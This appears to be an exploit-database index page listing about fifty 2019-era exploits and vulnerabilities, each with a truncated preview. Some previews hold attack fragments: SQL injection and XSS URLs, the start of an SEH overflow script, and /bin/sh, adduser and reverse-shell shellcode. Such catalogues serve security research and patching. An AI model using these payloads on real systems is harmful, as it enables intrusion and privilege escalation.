Part-DB 0.4 - Authentication Bypass Vulnerability
Exploit for php platform in category web applications...
ChaosPro 2.0 - Buffer Overflow (SEH) Exploit
Exploit Title: ChaosPro 2.0 - Buffer Overflow SEH Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://www.chaospro.de/ Software link: http://www.chaospro.de/cpro20.zip Version: 2.0 Tested on: Windows XP Pro OEM !/usr/bin/env python2 import os, sys sploit = "A" 5000 Crash! 41414141 in SEH!...
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - (description) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link:...
ClonOs WEB UI 19.09 - Improper Access Control Exploit
Exploit for php platform in category web applications Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control Exploit Author: İbrahim Hakan Şeker Vendor Homepage: https://clonos.tekroutine.com/ Software Link: https://github.com/clonos/control-pane Version: 19.09 Tested on: ClonOs CVE :...
AUO SunVeillance Monitoring System 1.1.9e - (MailAdd) SQL Injection Vulnerability
Exploit for hardware platform in category web applications Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e Tested on: ...
AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
Exploit for hardware platform in category web applications Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e Tested on:...
Linux Polkit pkexec Helper PTRACE_TRACEME Local Root Exploit
This Metasploit module exploits an issue in ptracelink in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel...
WordPress Sliced Invoices 3.8.2 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Sliced Invoices /wp-admin/admin.php?action=duplicatequoteinvoice&post=8%20and%20selectfromselectsleep20a--%20 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. -...
WordPress Sliced Invoices 3.8.2 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Sliced Invoices /wp-admin/admin.php?action=duplicatequoteinvoice&post=%3Cscript%3Ealert1%3C%2fscript%3E - The response will contain: Creation failed, could not find original invoice or quote: alert1 0day.today 2019-12-...
IObit Uninstaller 9.1.0.8 - (IObitUnSvr) Unquoted Service Path Vulnerability
Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path Author: Sainadh Jamalpur Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/en/advanceduninstaller.php Version : 9.1.0.8 Tested on: Windows 10 64bitEN CVE : N/A 1. Description: Unquoted service paths in...
Joomla! 3.4.6 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Joomla! 3.4.6 - Remote Code Execution Metasploit Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 -- 3.4.6 Tested on: Linux CVE : N/A This module requires...
Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability
Exploit for linux platform in category web applications Title: Rocket.Chat 2.1.0 - Cross-Site Scripting Author: 3H34N Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 2. Open a chat session 3. Send payload with your web server url 4. Token will be written in...
Sangoma SBC 2.3.23-119-GA Unauthenticated User Creation Vulnerability
A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to create a privileged user on the system using the web application login interface. Description A remotely exploitable vulnerability exists in the 2.3.23-119-GA versio...
Xorg X11 Server SUID modulepath Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and ru...
WiKID Systems 2FA Enterprise Server 4.2.0-b2032 SQL Injection / XSS / CSRF Vulnerabilities
WiKID Systems 2FA Enterprise Server version 4.2.0-b2032 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities. WiKID Systems 2FA Enterprise Server version 4.2.0-b2032 and earlier was found to be vulnerable to multiple Cross-Site Scripting, SQLi, an...
Sangoma SBC 2.3.23-119-GA Authentication Bypass Vulnerability
A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to bypass authentication and login as a non-existent user but with complete access to the dashboard including additional privileged user creation capabilities...
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Exploit Name: Linux/x86 - execve/bin/sh socket reuse Shellcode 42 bytes Author : WangYihang Tested on: Linuxx86 Shellcode Length: 42 CVE: N/A ;================================================================================ Shellcode : char shellcode =...
Total.js CMS 12 - Widget JavaScript Code Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Total.js CMS 12 Widget JavaScript Code Injection', 'Description' = %q This module exploits a vulnerability in Total.js CMS. The issue is that a...
Moxa EDR-810 - Command Injection / Information Disclosure Vulnerabilities
During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the w...
Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution Exploit
Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution Date: 2019-10-19 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: 1.62.0.1218 and below Tested on: Microsoft Windows CVE: N/A + Credits: John Page aka hyp3rlinx + Website:...
winrar 5.80 - XML External Entity Injection Exploit
Exploit Title: winrar 5.80 - XML External Entity Injection Exploit Author: albalawi Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe Version: 5.80 Tested on: Microsoft Windows Version 10.0.18362.418 64bit POC 1- python -m SimpleHTTPServer listens Port 8000 2- ope...
VMware VeloCloud 3.3.0 / 3.2.2 Authorization Bypass Vulnerability
Exploit for linux platform in category web applications Product: VeloCloud Vendor: VMware CVE ID: CVE-2019-5533 CSNC ID: CSNC-2019-007 Subject: Authorization Bypass Risk: Moderate Effect: Remotely exploitable CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Author: Silas Bärtsch Date:...
winrar 5.80 64bit - Denial of Service Exploit
Exploit Title: winrar 5.80 64bit - Denial of Service Exploit Author: alblalawi Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe Version: 5.80 Tested on: Microsoft Windows Version 10.0.18362.418 64bit 1- open winrar or any file.rar 2- help 3- help topics 4- Drag t...
Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 7f2c.8be8: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handling. This...
ASUS RT-N10+ 2.0.3.4 CSRF / XSS / Command Execution Exploit
ASUS RT-N10+ with firmware version 2.0.3.4 suffers from cross site request forgery and cross site scripting vulnerabilities that can assist with achieving command execution. Exploit Title: XSS And CSRF to RCE in ASUS RT-N10 Repeater Mode Exploit Author: Matheus Vrech Vendor Homepage:...
Joomla! 3.4.6 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Joomla! 3.4.6 - Remote Code Execution Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0.0 --...
Solaris xscreensaver 11.4 - Privilege Escalation Exploit
@Mediaservice.net Security Advisory 2019-02 last updated on 2019-10-16 Title: Local privilege escalation on Solaris 11.x via xscreensaver Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4 Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3 Other versions...
Microsoft Windows x64 – Privilege Escalation (UAC Protection Bypass printui.exe) Exploit
include include include include "resource.h" include include include define err -1 define dis 0 define def 1 define max 2 define BUFFER 8192 int CheckUac int ConsentAdmin; int EnableLua; DWORD BufferSize = BUFFER; RegGetValueHKEYLOCALMACHINE,...
WorkgroupMail 7.5.1 - (WorkgroupMail) Unquoted Service Path Vulnerability
Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path Exploit Author : Cakes Vendor: Softalk Version : 7.5.1 Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 Tested on Windows 10 CVE : N/A c:\sc qc WorkgroupMail SC QueryServiceConfig SUCCESS...
Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Google Dork: inurl:"\wp-content\plugins\soliloquy-lite" Exploit Author: Unk9vvN Vendor Homepage: https://soliloquywp.com/ Software Link:...
Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications...
Restaurant Management System 1.0 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Restaurant Management System 1.0 - Remote Code Execution Exploit Author: Ibad Shah Vendor Homepage: https://www.sourcecodester.com/users/lewa Software Link:...
Whatsapp 2.19.216 - Remote Code Execution Exploit
Exploit Title: Whatsapp 2.19.216 - Remote Code Execution Exploit Author: Valerio Brussani @valbrux Vendor Homepage: https://www.whatsapp.com/ Version: include include include typedef uint8t byte; char gadgetp; void libc, lib; //dls iteration for rop int dlcallbackstruct dlphdrinfo info, sizet siz...
Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Google Dork: inurl:"\wp-content\plugins\foogallery" Exploit Author: Unk9vvN Vendor Homepage: https://foo.gallery/ Software Link:...
BlackMoon FTP Server 3.1.2.1731 - (BMFTP-RELEASE) Unquoted Service Path Vulnerability
Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Service Path Exploit Author: Debashis Pal Vendor : Blackmoonftpserver Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server Version: BlackMoon FTP Server 3.1.2.1731 CVE : N/A Tested on: Windows 7...
Telegram Desktop (session hijacking) Payload Exploit
This vulnerability makes you able to Get full access. By hijacking User session using payload...
Web Companion versions 5.1.1035.1047 - (WCAssistantService) Unquoted Service Path Vulnerability
Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path Exploit Author: Debashis Pal Vendor Homepage : https://webcompanion.com Source: https://webcompanion.com Version: Web Companion versions 5.1.1035.1047 CVE : N/A Tested on: Windows 7 SP164bit 1...
ThinVNC 1.0b1 - Authentication Bypass Exploit
Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC1.0b1/ThinVNC1.0b1.zip/download Version: 1.0b1 Tested on:...
Accounts Accounting 7.02 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting Exploit Author: Debashis Pal Vendor Homepage: https://www.nchsoftware.com Source: https://www.nchsoftware.com/accounting/index.html Version: Express Accounts...
LiteManager 4.5.0 - (romservice) Unquoted Service Path Vulnerability
Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Service Path Exploit Author : Cakes Vendor: LiteManager Team Version : LiteManager 4.5.0 Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support Tested on Windows 10 CVE : N/A c:\sc qc romservice SC...
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...
Zilab Remote Console Server 3.2.9 - (zrcs) Unquoted Service Path Vulnerability
Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path Exploit Author : Cakes Vendor: Zilab Software Inc Version : Zilab Remote Console Server 3.2.9 Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support Tested on Windows 10 CVE : N/...
CyberArk Password Vault 10.6 - Authentication Bypass Vulnerability
Exploit for linux platform in category web applications Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass Author: Daniel Martinez Adan adon90 Vendor: https://www.cyberark.com Software:...
X.Org X Server 1.20.4 - Local Stack Overflow Exploit
Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow Exploit Author: Marcelo Vázquez aka s4vitar Vendor Homepage: https://www.x.org/ Version: = 1.20.4 Tested on: Linux CVE: CVE-2019-17624 !/usr/bin/python coding: utf-8 Author: Marcelo Vázquez aka s4vitar X.Org X Server 1.20.4 / X Protocol...
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode 74 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 Comments: add user "User" to /etc/passwd CVE: N/A / 00000000 31DB xor ebx,ebx 00000002 31C9 xor ecx,ecx 00000004 66B90104 mov cx,0x401...
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...
Mikogo 5.2.2.150317 - (Mikogo-Service) Unquoted Service Path Vulnerability
Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Service Path Exploit Author : Cakes Vendor: LiteManager Team Version : LiteManager 4.5.0 Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support Tested on Windows 10 CVE : N/A c:\sc qc Mikogo-Service SC...
Lavasoft 2.3.4.7 - (LavasoftTcpService) Unquoted Service Path Vulnerability
Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Author: Luis MedinaL Vendor Homepage: https://www.adaware.com/ Software Link : https://www.adaware.com/antivirus Version : 2.3.4.7 Tested on: Microsoft Windows 10 Pro x64 ESP Description: Lavasoft 2.3.4.7 installs LavasoftTcpService as...
Bolt CMS 3.6.10 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery Exploit Author: r3m0t3nu11Zero-Way Vendor Homepage: https://bolt.cm/ Software Link: https://bolt.cm/ Version: up to date and 6.5 Tested on: Linux CVE : CVE-2019-1759 last version Csrf...
sudo 1.8.28 - Security Bypass Exploit
Exploit Title : sudo 1.8.28 - Security Bypass Original Author: Joe Vennix Exploit Author : Mohin Paramasivam Version : Sudo priv" os.system"cat priv | grep 'ALL' | cut -d '' -f 2 binary" binaryfile = open"binary" binary= binaryfile.read execute sudo exp...